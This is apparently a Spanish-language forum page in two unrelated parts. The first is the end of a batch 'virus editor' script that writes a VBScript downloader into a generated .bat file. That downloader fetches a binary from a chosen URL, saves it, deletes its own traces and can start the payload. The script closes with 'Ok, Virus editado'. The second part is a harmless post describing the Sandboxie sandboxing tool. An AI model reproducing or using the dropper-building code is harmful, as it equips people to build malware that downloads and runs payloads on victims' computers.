echo echo Const adSaveCreateOverWrite = 2 ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Dim BinaryStream ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Set BinaryStream = CreateObject("ADODB.Stream") ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.Type = adTypeBinary ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.Open ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Function BinaryGetURL(URL) ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Dim Http ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Http.Open "GET", URL, False ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Http.Send ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryGetURL = Http.ResponseBody ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo End Function ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo CScript //nologo c:\%descarga%.vbs "%direciondescarga%" "%guardardescarga%" >> C:\%name%.bat
echo Del c:\%descarga%.vbs >> C:\%name%.bat
goto ejecute
:ejecute
cls
echo desea que se ejecute despues de la descarga?
echo  1.si
echo  2.no
echo.
set /p siono=
if %siono%==1 goto ejecutar
if %siono%==2 goto main
:ejecutar
cls
echo start %guardardescarga% >> C:\%name%.bat
echo Ok, Virus editado.
pause > nul
goto main




Saludos
#2632

Sandboxie

Sandboxie es un software de tipo sandbox (textualmente bandeja de arena) para Microsoft Windows, parecido a un sistema de virtualización por «aislamiento». Este freeware  crea un «contenedor» dentro del cual los programas de aplicación se ejecutan de forma segura.




Los que descargamos y probamos muchas aplicaciones de Internet no siempre tenemos confianza en el desarrollador de la herramienta. Podemos cubrirnos las espaldas con Sandboxie (www.sandboxie.com), que crea un área aislada en la que las aplicaciones instaladas no tienen privilegios para realizar cambios que puedan dañar el sistema.

Además, todos los archivos creados en esa zona desaparecen al cerrar Sandboxie (Archivo/Salir). Su funcionamiento es sencillo. Pulsa sobre su icono en la barra de tareas y aparecerá la ventana de control Sandboxie con las aplicaciones que se están ejecutando de forma segura. Para ejecutar una aplicación en estas condiciones haz clic con el botón derecho sobre el archivo del programa en cuestión y selecciona Ejecutar SandBoxed. Con ello pasará a ejecutarse en la zona segura y aparecerá en la ventana de control.


¿ Cómo funciona Sandboxie ?

Sandboxie ejecuta sus programas en un espacio aislado, que les impide realizar cambios permanentes a otros programas y datos en su computadora.



Las flechas rojas indican los cambios que se derivan de un programa que se ejecuta en el ordenador. El cuadro con la etiqueta del disco duro (sin caja de arena) se muestra la evolución de un programa que se ejecuta con normalidad. El cuadro con la etiqueta del disco duro (con caja de arena) se muestra la evolución de un programa que se ejecuta bajo Sandboxie. La animación muestra que Sandboxie es capaz de interceptar los cambios y aislarlos dentro de un cajón de arena, representado como un rectángulo amarillo. También ilustra que la agrupación de los cambios en conjunto hace que sea fácil de borrar todos a la vez.

Fuente: PC-Actual